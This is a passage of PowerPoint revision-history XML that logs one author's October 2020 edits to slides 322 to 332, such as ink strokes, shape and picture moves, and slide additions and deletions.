          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:04:37.851" v="14351" actId="1076"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="6" creationId="{F4B17874-B738-491A-9C6F-0EEF6353FFA2}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:04:47.212" v="14352" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="7" creationId="{4C71A6A5-3779-4DF7-A8EE-5A4AB543876F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8" creationId="{E644BDC5-85D5-4601-BE24-9125AD316BF2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9" creationId="{EA3BF598-7046-4D54-974B-E6C35D22B2D8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2" creationId="{E6053C72-8610-4309-8CB0-734A32F45D36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3" creationId="{2F586CAB-B292-4CF6-BEA3-B2F8C89707DC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5" creationId="{28AD199C-8A83-4BCD-AE3E-7018AA5E3151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6" creationId="{4D1B405B-5D53-4951-8A9A-D93B36C4A9E2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8" creationId="{05368F68-A675-4D8F-94EB-182C7B242193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9" creationId="{70A8DDD2-9830-4568-AEED-57A0B96F38B8}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:05:34.973" v="14364" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="20" creationId="{0A1AF8D1-5B5A-422E-81EF-8273C3ADE171}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:05:42.932" v="14365" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="21" creationId="{8A6BE43E-608C-4928-ACEF-EF89843D6870}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:05:50.671" v="14366" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="22" creationId="{210CC60C-99DE-47F7-AF0E-873E399E0B99}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:05:56.370" v="14368" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="23" creationId="{D0777873-6875-4F31-8EA4-94AFBB1EC747}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:06:00.166" v="14369" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370582596" sldId="322"/>
            <ac:inkMk id="24" creationId="{37BEBE4A-8213-4A94-AFD0-5753509AA3CF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:27:29.456" v="16036" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3930679725" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:09:36.124" v="14564" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3930679725" sldId="323"/>
            <ac:spMk id="2" creationId="{149E2637-A773-4CD2-BA34-BAD7D0957027}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:27:29.456" v="16036" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3930679725" sldId="323"/>
            <ac:spMk id="3" creationId="{F4C2FD48-5D9B-48DC-AF2C-559B02A9E2F0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:24:30.177" v="14931" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="200216065" sldId="324"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:10:13.394" v="14615" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="200216065" sldId="324"/>
            <ac:spMk id="2" creationId="{4419D066-D513-46AC-9471-70DA5AC60D93}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:26:16.482" v="14942" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2121631108" sldId="324"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:24:20.847" v="14930" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3347365745" sldId="325"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod ord">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:44:24.518" v="15431" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4216732440" sldId="325"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:26:27.260" v="14957" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4216732440" sldId="325"/>
            <ac:spMk id="4" creationId="{109942E4-E5EC-409B-81F6-0AA8029AE2FB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T17:44:24.518" v="15431" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4216732440" sldId="325"/>
            <ac:spMk id="5" creationId="{A898A89D-645B-47DD-8760-039A787F90A7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8:02:07.845" v="15577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="543165389" sldId="326"/>
        </pc:sldMkLst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2" creationId="{9C7A5921-576A-4068-8D32-7EBF2C9EF0A8}"/>
          </ac:spMkLst>
        </pc:spChg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3" creationId="{3897C51C-A12D-4524-9B0D-A370F8A8355E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:02:02.878" v="15576" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="543165389" sldId="326"/>
            <ac:spMk id="5" creationId="{48E0DE99-1CF9-4DFA-9809-15798FC769EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:01:41.141" v="15573" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="543165389" sldId="326"/>
            <ac:picMk id="4" creationId="{7CAFD673-7869-4ABB-B5D4-E0F6726752BB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:12:10.701" v="15580" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="771146669" sldId="327"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:16:45.272" v="15681" actId="1037"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2484432896" sldId="327"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:16:45.272" v="15681" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484432896" sldId="327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4" creationId="{8305F4AF-0BBA-4FF5-B960-3988B04F00C4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7" creationId="{BBAC29DF-FC8C-4D0A-8BCC-9A479C568C4B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3:56.087" v="15583" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484432896" sldId="327"/>
            <ac:picMk id="2" creationId="{C6520F21-9662-40A4-B6AE-15AD8B476635}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:14:00.191" v="15585" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484432896" sldId="327"/>
            <ac:picMk id="3" creationId="{911683C9-3C11-41D4-BFF3-47D866E812CF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:16:45.272" v="15681" actId="1037"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2484432896" sldId="327"/>
            <ac:picMk id="5" creationId="{0A24998F-DA95-441D-8761-396CB5023B68}"/>
          </ac:picMkLst>
        </pc:pic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83" creationId="{2BB700F6-7ECB-4F2C-A5BF-B9D3534159DC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02:40.880" v="16168"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3796534056" sldId="328"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:14:56.457" v="15618" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:spMk id="3" creationId="{7EBD9C13-020F-458A-AAA0-C04CE55FBCA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:14:28.814" v="15595" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:spMk id="55" creationId="{D9E3E30B-A321-4E7F-947D-17701F438A3A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:14:30.256" v="15596" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328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8:21:10.414" v="15766" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:spMk id="61" creationId="{B150CB2D-C3B9-4AB5-AF64-9AAF7A9C4A72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:17:14.503" v="15742" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:spMk id="67" creationId="{91CBD7F4-0FA0-4282-AC93-97D9362F5AE9}"/>
          </ac:spMkLst>
        </pc:s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15" creationId="{428B37CF-0B6F-4CF7-A20B-34E5BF18EFBE}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:18:57.908" v="15751" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:grpSpMk id="19" creationId="{D211AA2C-C88B-4FCA-84CE-DA5D43ABAA46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4:10.349" v="15588" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328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8:14:27.343" v="15594" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:picMk id="4" creationId="{9709DC75-C1A6-4E3F-A776-D4F21943EC8C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:17:14.503" v="15742" actId="1037"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:picMk id="5" creationId="{0A24998F-DA95-441D-8761-396CB5023B68}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:14:19.101" v="15591" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:picMk id="12" creationId="{5093DAD0-EC95-4EE6-8706-B6773321A18D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:16:53.205" v="15682" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:picMk id="16" creationId="{2EBA74F6-666A-4777-B735-492E14490192}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:17:40.798" v="15746" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:picMk id="18" creationId="{17A25611-AA08-4E17-BE4A-D9E7662105D1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:21:35.957" v="15771" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:picMk id="20" creationId="{D28BD704-FA15-4AE5-B57E-3B0A7818F7FD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T18:14:22.162" v="15592"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3796534056" sldId="328"/>
            <ac:picMk id="57" creationId="{E68AAC95-428C-43D8-9398-F5ABD3A2206A}"/>
          </ac:picMkLst>
        </pc:pic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9" creationId="{F5451ED0-72B6-47E9-9ECE-35F99B4B19E3}"/>
          </ac:inkMkLst>
        </pc:ink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17" creationId="{1D7883C2-F4C9-4E10-9723-FF3F395719B6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83" creationId="{2BB700F6-7ECB-4F2C-A5BF-B9D3534159DC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:19:15.128" v="16600" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="355301462" sldId="329"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:17:35.241" v="16497" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="355301462" sldId="329"/>
            <ac:spMk id="70" creationId="{384D61BC-5624-4F68-9622-C90D085EBC17}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:18:09.512" v="16557" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="355301462" sldId="329"/>
            <ac:spMk id="71" creationId="{230E122C-7479-4007-B006-1E557B8496AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:19:15.128" v="16600" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="355301462" sldId="329"/>
            <ac:spMk id="72" creationId="{F6231725-2B37-4C29-9EDD-8D6D44BFA2B2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:43:55.152" v="17173" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2260072284" sldId="330"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:45:47.394" v="17267" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2101057785" sldId="331"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:44:29.579" v="17178" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2101057785" sldId="33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45:47.394" v="17267" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2101057785" sldId="331"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{6522DB22-9B34-43BC-AD9C-03E4ABD0BD6B}" dt="2020-10-18T19:46:17.401" v="17272"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2908151649" sldId="332"/>
        </pc:sldMkLst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  <pc:docChgLst>
    <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-21T20:43:36.995" v="4013" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-21T20:43:36.995" v="4013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F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T19:42:04.879" v="1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9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-21T20:43:36.995" v="4013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90495379" sldId="25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31177413" sldId="25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242768232" sldId="26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28453235" sldId="26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51763001" sldId="26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501499902" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:50:51.976" v="1161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F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:47:43.431" v="779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19:50:51.976" v="1161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F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:47:46.194" v="780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52914273" sldId="26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307553" sldId="26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95743560" sldId="27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11953920" sldId="27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76773835" sldId="27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009463458" sldId="27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73558857" sldId="27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803453" sldId="27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35435411" sldId="27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01355083" sldId="27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702961727" sldId="27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14673380" sldId="27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75122308" sldId="28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7984464" sldId="28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5743477" sldId="28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63265745" sldId="28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94653921" sldId="28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62856631" sldId="28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2405349" sldId="28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54159029" sldId="28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254561628" sldId="28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17144612" sldId="28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419683313" sldId="29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10794045" sldId="29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14232668" sldId="29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43004699" sldId="29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375899411" sldId="29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327118210" sldId="29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11963194" sldId="29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2880305" sldId="29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2233623" sldId="30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430102" sldId="30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45803796" sldId="30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190681715" sldId="30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07985538" sldId="30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27136259" sldId="30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28723883" sldId="30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98173701" sldId="31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1995165" sldId="31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07307255" sldId="31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94571397" sldId="31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22635270" sldId="31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52037997" sldId="31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8208907" sldId="31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4957509" sldId="31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042374777" sldId="31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605790671" sldId="31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06725017" sldId="32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9691000" sldId="32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0582596" sldId="32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30679725" sldId="32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6732440" sldId="32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43165389" sldId="32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484432896" sldId="32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96534056" sldId="328"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T19:42:34.840" v="14" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="355301462" sldId="329"/>
        </pc:sldMkLst>
        <pc:inkChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T19:42:34.840" v="14" actId="478"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="355301462" sldId="329"/>
            <ac:inkMk id="49" creationId="{92ABEA88-E166-4647-82C7-3D62B414EB5C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord setBg delAnim modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:43:02.497" v="707" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3120802679" sldId="330"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:32:36.527" v="576" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330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30:48.528" v="550" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:spMk id="46" creationId="{707A1323-A01F-4A12-A3CD-70F3050A38A8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:30:46.647" v="549" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:spMk id="47" creationId="{22FCCFCB-02BD-48FE-B413-182A458F68FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:43:02.497" v="707" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:spMk id="48" creationId="{4CF7F082-01A2-4ECF-B592-6FB526994AF3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
